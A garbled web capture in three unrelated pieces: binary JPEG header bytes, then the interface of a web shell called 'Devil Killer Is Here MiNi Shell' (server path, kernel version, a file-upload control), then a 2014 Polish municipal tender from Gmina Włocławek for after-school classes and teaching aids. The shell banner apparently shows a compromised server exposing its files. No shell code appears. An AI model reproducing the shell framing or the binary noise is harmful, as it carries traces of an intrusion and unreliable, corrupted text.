JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140116/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140116/18482-N-2014.html

<p class="kh_header"><b>Włocławek: Przygotowanie i realizacja zajęć pozalekcyjnych oraz dostawa materiałów edukacyjnych do szkół podstawowych w gminie Włocławek w ramach projektu systemowego PO KL 9.1.2  pn. Nauka szansą dzieci z Gminy Włocławek współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</b><br>
<b>Numer ogłoszenia: 18482 - 2014; data zamieszczenia: 16.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Włocławek , ul. Królewiecka 7, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 0-54 230 53 00; 230 53 37, faks 054 230 53 53.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gmina.wloclawek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowanie i realizacja zajęć pozalekcyjnych oraz dostawa materiałów edukacyjnych do szkół podstawowych w gminie Włocławek w ramach projektu systemowego PO KL 9.1.2  pn. Nauka szansą dzieci z Gminy Włocławek współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Realizacja zajęć pozalekcyjnych Zajęcia przewidziane do realizacji w Szkole Podstawowej w Smólniku 1. zajęcia dla dzieci z trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji liczba grup 2, liczba godzin zajęć na grupę 30, długość 1 godziny zajęć	(45 min.), 2. zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych liczba grup 1, liczba godzin zajęć na grupę 30, długość 1 godziny zajęć (45 min.), 3. zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy liczba grup 1, liczba godzin zajęć na grupę 30, długość 1 godziny zajęć(60 min.) 4. gimnastyka korekcyjna dla dzieci z wadami postawy liczba grup 2, liczba godzin zajęć na grupę 30, długość 1 godziny zajęć (60 min.), 5. zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych: matematyczno-przyrodniczo liczba grup 1, liczba godzin zajęć na grupę 30, długość 1 godziny zajęć (45 min.) 6. zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych: polonistycznie liczba grup 1, liczba godzin zajęć na grupę 30, długość 1 godziny zajęć	(45 min.) 7. zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych: artystycznie liczba grup1, liczba godzin zajęć na grupę 30, długość 1 godziny zajęć(45 min.). Zajęcia przewidziane do realizacji w Szkole Podstawowej w Kruszynie 1. zajęcia dla dzieci z trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji liczba grup 2, liczba godzin zajęć na grupę 30, długość 1 godziny zajęć	(45 min.) 2. zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych liczba grup1,liczba godzin zajęć na grupę 30, długość 1 godziny zajęć (45 min.) 3. zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy liczba grup	2, liczba godzin zajęć na grupę 30, długość 1 godziny zajęć (60 min.) 4. gimnastyka korekcyjna dla dzieci z wadami postawy liczba grup 2, liczba godzin zajęć na grupę 30, długość 1 godziny zajęć (60 min.). Zamówienie obejmuje prowadzenie zajęć w podanym wymiarze godzin zgodnie z opisem przedmiotu zamówienia, w roku szkolnym 2013/2014. Zajęcia będą realizowane na terenie szkół objętych projektem, Zamawiający zapewni sale dydaktyczne do realizacji zajęć. Wykonawca w terminie 7 dni od dnia podpisania umowy sporządzi i dostarczy Zamawiającemu Szczegółowy harmonogram realizacji zajęć dla każdej ze szkół, zawierający co najmniej: terminy realizacji zajęć (dni, godziny), nauczyciela prowadzącego, wykaz uczestników w grupie
Harmonogram musi uwzględniać plan pracy szkół, tj. plan zajęć uczniów, dostępność sal, harmonogram odwozów, oraz każdorazowo wymaga zatwierdzenie przez dyrektora szkoły. Wykonawca będzie miał obowiązek: przygotowania programów poszczególnych zajęć uwzględniających indywidualną pracę z uczniem, prowadzenia miesięcznego rejestru zrealizowanych godzin, prowadzenia dzienników zajęć (jednolite na wszystkie zajęcia), prowadzenia imiennych list obecności (jednolite na wszystkie zajęcia), przeprowadzenia końcowych ocen uczestników zajęć 
Wykonawca będzie zobowiązany do zapewnienie kadry dydaktycznej posiadającej kwalifikacje do prowadzenia zajęć z poszczególnych zakresów zgodnie z rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz.U. z 2013 r. poz. 1207). Dostawa materiałów edukacyjnych Materiały dydaktyczne do realizacji zajęć w Szkole Podstawowej w Smólniku 1) Pomoc dydaktyczna na poziomie dla uczniów bardziej zaawansowanych w czytaniu. Służy do usprawniania u dzieci widzenia obuocznego, koncentracji, uwagi wzrokowej. Pakowane w wygodne pudełko tekturowe ułatwiające przechowywanie. W zestawie znajdują się dodatkowo instrukcja i 4 tablice do ćwiczeń z różnymi tekstami. szt. 6 2) Zestaw składający się z 8 kart o wym. 29,7 x 10,5 cm służący do zabawy polegającej na ułożeniu z klocków zawierających literki wyrazów będących podpisem do ilustracji znajdującej się na karcie z liter na niej wymienionych. szt. 6 3) Zestaw składający się z 75 kart (15 kart z ilustracjami + 60 kart z tekstami) umożliwiający ćwiczenia mowy. Pięć serii ilustracji wraz z tekstami obrazującymi wspomaga budowanie poprawnych gramatycznie zdań oraz niweluje trudności w porozumiewaniu się. szt. 5 4) Pomoc dydaktyczna poprawiająca u dzieci umiejętności manualne, koordynację wzrokowo-ruchową, twórcze myślenie, znajdowanie różnic i podobieństw. Ćwiczenia polegają m.in. na odwzorowywaniu obrazków znajdujących się na 20 kartach przy pomocy kolorowych elementów w różnych kształtach. W skład zestawu wchodzi 20 kart, kolorowe elementy, drewniane opakowanie. szt. 6 5) Układanki edukacyjne, składające się z trójkątnych elementów, na których bokach zapisane są zadania bądź odpowiedzi w zakresie dodawania i odejmowania do 20. Zabawa polega na układaniu trójkątów tak, aby do zadań dopasować odpowiedzi tworząc z trójkątów odpowiednią figurę. Zestaw zawiera 2 układanki po 24 elementy; łącznie 48 kart (o boku 6 cm) w pudełku z wkładką do sortowania.	 szt. 6 6) Układanki edukacyjne, składające się z trójkątnych elementów, na których bokach zapisane są zadania bądź odpowiedzi w zakresie dodawania i odejmowania do 100. Zabawa polega na układaniu trójkątów tak, aby do zadań dopasować odpowiedzi tworząc z trójkątów odpowiednią figurę. Zestaw zawiera 2 układanki po 24 elementy; łącznie 48 kart (o boku 6 cm) w pudełku z wkładką do sortowania. szt.6 7) Układanki edukacyjne, składające się z trójkątnych elementów, na których bokach zapisane są zadania bądź odpowiedzi w zakresie mnożenia i dzielenia do 100. Zabawa polega na układaniu trójkątów tak, aby do zadań dopasować odpowiedzi tworząc z trójkątów odpowiednią figurę. Zestaw zawiera 2 układanki po 24 elementy; łącznie 48 kart (o boku 6 cm) w pudełku z wkładką do sortowania. szt.6 8) Układanki edukacyjne, składające się z trójkątnych elementów, na których bokach zapisane są zadania bądź odpowiedzi w zakresie miar wagowych. Zabawa polega na układaniu trójkątów tak, aby do zadań dopasować odpowiedzi tworząc z trójkątów odpowiednią figurę. Zestaw zawiera 2 układanki po 24 elementy; łącznie 48 kart (o boku 6 cm) w pudełku z wkładką do sortowania. szt. 8 9) Układanki edukacyjne, składające się z trójkątnych elementów, na których bokach zapisane są zadania bądź odpowiedzi w zakresie miar długości. Zabawa polega na układaniu trójkątów tak, aby do zadań dopasować odpowiedzi tworząc z trójkątów odpowiednią figurę. Zestaw zawiera 2 układanki po 24 elementy; łącznie 48 kart (o boku 6 cm) w pudełku z wkładką do sortowania.	szt. 8 10) Układanki edukacyjne, składające się z trójkątnych elementów, na których bokach zapisane są zadania bądź odpowiedzi w zakresie sekund, minut i godzin. Zabawa polega na układaniu trójkątów tak, aby do zadań dopasować odpowiedzi tworząc z trójkątów odpowiednią figurę. Zestaw zawiera 2 układanki po 24 elementy; łącznie 48 kart (o boku 6 cm) w pudełku z wkładką do sortowania.szt. 8
11) Waga metalowa wym. 14 x 17 x 40 cm max ciężar 2 kg. nie zawiera odważników szt.1 12) Zestaw 10 odważników w pudełku: 2 x 1 g 2 x 2 g 2 x 5 g 2 x 10 g 1 x 20 g 1 x 50 g szt.3 13) Mata przeznaczona do fizykoterapii oraz ćwiczeń psychoruchowych. Pokryta wypustkami stymulującymi receptory oraz układ krążenia. Waga 4kg, wymiary 120cmx60cm, szt. 4 14) Specjalistyczne oprogramowanie wspomagające profilaktykę, diagnozę i terapię pedagogiczną,  pozwalające na przeprowadzenie profesjonalnej, efektywnej i atrakcyjnej dla dziecka terapii trudności w nauce czytania i pisania. Oprogramowanie musi składać się  z modułu wspomagającego diagnozę  oraz modułu terapeutycznego.szt.2 b) Materiały dydaktyczne do realizacji zajęć w Szkole Podstawowej w Kruszynie 15) Pakiet multimedialny służący do rozszerzonej terapii logopedycznej. Program ten musi zawierać: - 14 programów do diagnozy i terapii logopedycznej: Szereg szumiący: moduł podstawowy, Szereg syczący: moduł podstawowy, Szereg ciszący: moduł podstawowy, Szereg szumiący: moduł profesjonalny, Szereg syczący: moduł profesjonalny, Szereg ciszący: moduł profesjonalny, Różnicowanie szeregów, Głoska r: moduł podstawowy, Głoski r, l: moduł profesjonalny, Głoski tylnojęzykowe k, g, h, Mowa bezdźwięczna, Sfonem, Echokorektor, Trening logopedyczny-Aplikacja logopedy z Modułem diagnostycznym - zestaw pomocy dydaktycznych - profesjonalny mikrofon , szt 1 16) Komplet 68 kart (12,5 x 11 cm) ćwiczący spostrzegawczość i logiczne myślenie. Składający się z obrazków przedstawiających nietypowe sytuacje pełne nieścisłości. szt. 1 17) Zestaw 252 obrazków i wyrazów na kartonikach do badania i doskonalenia słuchu fonemowego dzieci., szt. 1 18) Trójelementowe puzzle nie stanowiące całości pod względem tematycznym, ale odnoszące się  do określonych zależności. Zadaniem dziecka jest wybranie 3 właściwych kart, wykorzystując logiczne myślenie i odwołując się do swojej wiedzy o świecie., szt. 1 19) Puzzle logopedyczne zawierające materiał ćwiczeniowy utrwalający prawidłową wymowę, utrwalający wiedzę, rozwijający spostrzegawczość i wyobraźnię, kształtujący umiejętność określania stosunków przestrzennych pomiędzy elementami, rozwijający umiejętność logicznego myślenia i zapamiętywania, wzmacniający koncentrację. Komplet składający się z 2 zestawów ćwiczeń oraz 2 kompletów puzzli. , szt.1 20) Puzzle logopedyczne zawierające materiał ćwiczeniowy . Komplet składający się z 2 zestawów ćwiczeń oraz 2 kompletów puzzli. Zestaw zawierający materiał językowy do utrwalania właściwej wymowy głosek: j, ł, ch, n, m, ich poprawnego czytania, pisania oraz dzielenia wyrazów na sylaby., szt.1 21) Gra skojarzeniowa przeznaczona do nauki odpowiedniej postawy i zachowania w stosunku do kolegów z klasy. Polegająca na dopasowaniu 17 par różnych postaw i określenia, co jest właściwe, a co nie. W zestawie: 34 karty (9 x 9 cm) oraz przewodnik metodyczny., szt.	1 22) Piłka do masażu z kolcami - mała śr.16 cm, szt. 1 23) Piłka do masażu z kolcami Śr. 11cm, szt. 1 24) Piłka do masażu z kolcami Śr. 9cm, szt. 1 25) Elastyczna piłeczka do zabawy i gimnastyki dłoni. Wypełniona twardym, ruchomym granulatem stymulująca zakończenia nerwowe na skórze. Wykorzystywana do automasażu, stymulująca odnowienie wrażeń czuciowych. Średnica 7 cm., szt. 2 26) Miękki kolczasty wałeczek z przeznaczeniem do ćwiczeń wzmacniających mięśnie palców, dłoni, przedramienia, ramienia, a także do masażu relaksującego. Waga 250 g., szt. 1 27) Gra polegająca na układaniu dziecięcych twarzy z elementów, które dzieci wybierają po wyrzuceniu 3 kostek. Po złożeniu obrazka w całość opisują wyrażane emocje. W zestawie 21 elementów. Wym. opakowania: 22,5 x 22,5 x 4,5 cm, szt.1 28) Zestaw 5 małych i 5 dużych dysków przeznaczony do budowania ścieżki zdrowia dla małych stóp. Intensywne kolory oraz różne faktury zapewniają stymulację wielozmysłową. Wym. 27 x 5 cm oraz 11 x 5 cm.	, szt.1 29) Pojazd dla przedszkolaków, kształtujący sylwetkę. Wym.: 41 x 31 cm., szt.1 30) Platforma równoważna - koło. Śr.: 40 cm, + 3 piłki. Obciążenie do 80 kg., szt. 1 31) Mały mikrofon bezprzewodowy MP3 z możliwością nagrywania (4h dźwięku wysokiej jakości) i odtwarzania. Wyposażony w wejście USB (schowane w końcówce rączki), W zestawie smycz oraz kabel USB. Wym.: śr. 4,3 cm, dł. 13 cm., szt.1 32) Pomoc dydaktyczna polegająca na zabawie latającym jajem. Doskonali zręczność, koncentrację uwagi, spryt, spostrzegawczość ćwiczy koordynację wzrokowo-ruchową, zdolność przewidywania. Przy okazji uczestnik, zupełnie nieświadomie, ćwiczy koordynację wzrokowo-ruchową, zdolność przewidywania. Przy okazji uczestnik, zupełnie nieświadomie, wykonuje wiele ćwiczeń fizycznych.  Długość sznurka: 220 cm, wym. jaja: 20 x 13 cm, szt. 1 33) Zestaw 50 kart demonstracyjnych z różnego typu ubraniami, butami. Karty wykonane  z lakierowanej tektury wysokiej jakości. Wym.: 20,9 x 14,9 cm. Całość zapakowana w trwałe opakowanie (22,5 x 16 x 6,4 cm) ze specjalnym systemem otwierania., szt. 1 34) Piłki - woreczki rehabilitacyjne do ćwiczeń równoważnych. Zestaw zawierający 6 sztuk woreczków. Waga: 300 g., szt.1 35) Piłka do masażu z wypustkami. Maksymalne obciążenie 150 kg.Wym.: śr. 40 cm., szt.1 36) Piłka na sznurku z  przeznaczaniem do ćwiczeń ruchowych, kształtowania precyzji ruchu, zręczności, sprytu oraz umiejętności panowania nad własnym ciałem. Śr. piłki 20 cm, dł. linki 150 cm, szt.	2 37) Piłki wypełnione kuleczkami z PVC i nietoksycznym żelem umożliwiające przemieszczanie się kulek podczas ściskania. W zestawie 3 szt. Śr.: 10 cm., szt. 1 38) Pomoc składająca się z 3 elastycznych krążków z kolcami o różnej twardości zapewniających kojącą stymulację dotykową (poprzez skręcanie, ściskanie, kręcenie), rozwijanie mięśni śródręcza. Śr. 15 cm, gr. 3 cm., szt. 1 39) Ściskacz sensoryczny pobudzający krążenie krwi w dłoniach i palcach, wzmacniający mięśnie, masujący dłoń. W zestawie 6 szt. o śr. 6,5 cm i gr. 1,3 cm., szt.1 40) Pomoc dydaktyczna polegająca na łapaniu piłki ćwicząca koordynację wzrokowo ruchową, zręczność, spostrzegawczość, doskonaląca szybkość reakcji. Zawartość zestawu: 3 szt. pomocy do łapania piłek Dł. 38 cm, śr. piłki: 7 cm., szt.1 41) Multimedialne oprogramowanie do nauki czytania i pisania. Program zawierający różnorodne ćwiczenia interaktywne, animacje, kolorowe ilustracje i narrację, dostosowane do wieku odbiorcy, wprowadzające go w świat liter, wyrazów, zdań oraz tekstów.  Program zawierający ćwiczenia o narastającym poziomie trudności,  rozwijające kreatywność oraz umiejętność kojarzenia pojęć, a także doskonalące koncentrację. Pomoc zawierająca zagadnienia : rozpoznawania i pisania wszystkich liter polskiego alfabetu, składania liter, sylab i głosek w wyrazy, nauki pisania i czytania wyrazów, czytania i rozumienia zdań o zróżnicowanej budowie gramatycznej i składniowej, rozumienia sensu wypowiedzi i ciągu przyczynowo - skutkowego, tworzenia tekstów., szt.1 42) Logiczna gra matematyczna doskonaląca i rozwijająca umiejętności matematyczne. W zestawie: 104 plastikowe kostki o wym. 2,5 x 3,9 x 0,5 cm z liczbami 1-13 w 4 kolorach, w tym 2 kostki-joker oraz 4 czarne stojące podstawki o wym. 33,5 x 9 cm. Gra przeznaczona dla 2-4 osób., szt. 1 43) Pakiet 18 zeszytów pozwalających poznać wszystkie litery polskiego alfabetu, wcześnie rozpocząć naukę czytania, zwiększać zasób słownictwa, opanować strukturę czytania ze zrozumieniem, nauczyć się w przyszłości pisowni trudnych wyrazów. Zawartość: 18 zeszytów, szt. 2 44) Tarcza z znajdującymi się na jej obwodzie  sylabami początkowymi i końcowymi,  w środku z  sylabą powtarzającą się we wszystkich wyrazach. W zestawie: 30 tarcz oraz pomoce ułatwiające łączenie odpowiednich sylab w wyrazy: strzała oraz tarcza z okienkiem., szt.6 45) Zestaw klocków z alfabetem (bez polskich znaków) do wykorzystania w czasie zabaw językowych m.in. do układanek wyrazowych o różnym stopniu trudności w jęz. polskim i angielskim. 135 el., szt. 4 46) Pomoc dydaktyczna składająca się z klocków z polskimi literami w dwóch klasycznych kolorach: czerwone samogłoski i niebieskie spółgłoski. 146 el., szt. 4 47) Duży zestaw klocków do zajęć matematycznych: nauka liczenia porównywanie wielkości i ilości dodawanie i odejmowanie. Pomoc składająca się z  259 el. oraz kart pracy. szt.4 48) Gra przeznaczona dla 2-4 graczy w wieku od 7 do 100 lat. W skład zestawu wchodzą: sztywna, lakierowana plansza, 108 plakietek z obrazkami produktów, pieniążki do gry, 4 koszyczki na zakupy, 4 różnokolorowe pionki, 2 kostki do gry,25 kart niespodzianek, instrukcja., szt.2 49) Zestawy szlaczków graficznych wspomagających ćwiczenia rozmachowe. W każdym występują 4 plansze o wym. 98 x 17 cm wykonane z tworzywa po których można pisać suchościeralnymi mazakami. Gra dla dzieci od 6 roku życia; w zestawie podwójny szlaczek do kreślenia łamanych ciągłych z 1 cm odstępem dwa razy podwójny szlaczek do kreślenia literopodobnych wzorów po śladzie kropkowym, szt.	2 50) Zestawy szlaczków graficznych wspomagających ćwiczenia rozmachowe. W każdym  występują 4 plansze o wym. 98 x 17 cm wykonane z tworzywa po których można pisać suchościeralnymi mazakami. Z grafiką oraz szerokością linii (1cm) przeznaczony jest dla małych dzieci od 4 roku życia;, szt. 2 51) Zestawy szlaczków graficznych wspomagających ćwiczenia rozmachowe.  W każdym też występują 4 plansze o wym. 98 x 17cmwykonane z tworzywa po których można pisać suchościeralnymi mazakami. w zestawie: podwójny szlaczek do kreślenia łamanych ciągłych z 1 cm odstępem dwa razy podwójny szlaczek do kreślenia literopodobnych wzorów po śladzie kropkowym; gruszki; wisienki, szt. 2 52) Domino, w którym każdej kostce znajdują się dwie sylaby otwarte. Gra polega na łączeniu kostek z takimi samymi sylabami. wym. kostki 3 5 x 7 cm zawartość 24 kostki, szt. 3 53) Zestaw 136 dwustronnych kartoników służących do układania w puzzle podzielnych na cztery kategorie: trzysylabowe wyrazy, dwusylabowe wyrazy.  małe i duże litery, wyrazy ilustrowane obrazkami. Zestaw zawiera instrukcję przykładowych zabaw i ćwiczeń., szt.3 54) Jest to zestaw uświadamiający że te same sylaby mogą tworzyć różne wyrazy. Komplet 24 klocków  wym. 3 5x7cm  z dwuliterowymi sylabami otwartymi. Zadaniem dziecka jest układanie z nich wyrazów., szt. 4 55) Matematyczna gra ruchowa w formie maty podłogowej do nauki dodawania i odejmowania w zakresie 12. Mata winylowa o wym. 122 x 152 cm; 2 kostki piankowe z liczbami (dł. boku 12 7 cm); 1 kostka piankowa ze znakami plus i minus (dł. boku 12 7 cm); 28 kartonowych żetonów, szt. 1 56) Waga metalowa wym. 14 x 17 x 40 cm max ciężar 2 kg. nie zawiera odważników, szt. 1 57) Zestaw 10 odważników w pudełku: 2 x 1 g 2 x 2 g 2 x 5 g 2 x 10 g 1 x 20 g 1 x 50 g, szt. 1 58) Mata z dwoma ruchomymi wskazówkami: godzinową i minutową umożliwiającym ćwiczenia odczytywania i zapisywania czasu. Mata winylowa o boku 137 cm; 2 nadmuchiwane kostki o boku 12 cm, szt.1 59) Mapa o wadze 2,140 kg przedstawiająca Europę z zaznaczonymi kolorowymi państwami, które można dopasowywać do ich konturów., szt.1 60) Zestaw instrumentów tamburyn, tamburyn z membraną, 5 trójkątów (10-20 cm), 2 drewniane marakasy, duże guiro z tarką, 2 tonblok, 2 tony tonblok (1 ton). Zestaw spakowany w wygodną torbę z trwałej tkaniny wyposażoną w zamek, ułatwiającą transportowanie instrumentów., szt.1 61) Plansze edukacyjne do nauki języka angielskiego wykonane z tektury w formie 4 sezonowych drzew (wys. 63 5 cm)., szt.1 62) 10 plansz w 3 linie (tło czarne, linie białe - rewers czarny), do ćwiczeń grafomotorycznych (kreślenie liter) z wykorzystaniem białego ołówka.  tablice zmywalne na mokro. wym. 20,5 x 24,5 cm, szt.4 63) Białe ołówki do rysowania na tablicach zmywalnych 12 szt., szt.10 64) Składanka harmonijkowa w formie gąsienicy zawierająca 40 suwaków z powtarzającą się sylabą początkową (nagłosową) oraz 40 z powtarzającą się sylabą końcową (wygłosową)., szt.4 65) Basen piankowy o wymiarach wym. 2 x 2 x 0,6 m - pow. wewn. 2,6 m2 wypełniony 4000 plastikowymi piłeczkami o śr. 6,5 cm.	, szt.1 66) Kolorowe ślady stóp . 6 par wym. 22,5 cm Wykonane z elastycznego, trwałego tworzywa., szt.4 67) Kolorowe ślady dłoni. 6 par wym. 22,5 cm Wykonane z elastycznego, trwałego tworzywa., szt.4 68) Kolorowe kreski 6 szt. dł. 34,5 cm szer. 7,2 cm. Wykonane z elastycznego, trwałego tworzywa., szt. 4 69) Kolorowe proste strzałki 6 szt. Wykonane z elastycznego, trwałego tworzywa., szt.4 70) Lakierowane karty połączone w książeczkę. Służące do nauki się rozróżniania tworzywa: szkło drewno plastik tkanina papier oraz przyporządkowywania przedmiotów z nich zrobionych. wym. 28,5 x 10,5 cm, szt.1 71) Kolorowe kierunkowe strzałki 6 szt. 6 kolorów szer. 9 cm. Wykonane z elastycznego, trwałego tworzywa., szt. 4 72) Zestaw 48 zdjęć które tworzą logiczne pary do wykorzystania przy zabawach edukacyjnych. 48 zdjęć o wym. 10 x 15 cm, szt.1 73) Układanka logopedyczna w formie piramidy. Zawiera 25 trójkątów z wyrazami, literami. Zabawa uczy prawidłowej wymowy głosek: b-p, d-t, w-f. Wym. trójkątów: 8 x 8 x 8 cm. Wym. opakowania: 17,4 x 4 cm., szt. 1
Zamówienie obejmuje dostawę sprzętu i pomocy dydaktycznych do szkół podstawowych w gminie Włocławek, zgodnie z opisem przedmiotu zamówienia.
Dostawa zostanie zrealizowana w przeciągu 30 dni od dnia podpisania umowy. Dostawy nastąpią bezpośrednio do siedziby szkół, na koszt wykonawcy. Potwierdzenie dostawy nastąpi poprzez podpisanie przez uprawnionego pracownika szkoły protokołu odbioru.  
Pomoce edukacyjne przeznaczone będą dla dzieci ze szkół podstawowych do prowadzenia zajęć edukacyjnych, powinny zatem posiadać odpowiednie atesty i certyfikaty zgodności z europejskimi normami oraz być w pełni bezpieczne dla dzieci.
Wskazany przez zamawiającego opis przedmiotu zamówienia stanowi informację uściślającą i należy je traktować jako określone przykładowo w celu sprecyzowania minimalnych oczekiwanych przez zamawiającego parametrów jakościowych i wymaganych standardów przedmiotu zamówienia.
Wykonawca na podstawie poniższego opisu przedmiotu zamówienia zobowiązany będzie do zaoferowania pomocy edukacyjnych poprzez precyzyjne określenie nazwy asortymentu, wydawnictwa (producenta) oraz wskazanie numeru katalogowego i ceny. Powyższe dane wykonawca zobowiązany będzie do wskazania w formularzu ofertowym będącym załącznikiem do niniejszej SIWZ.
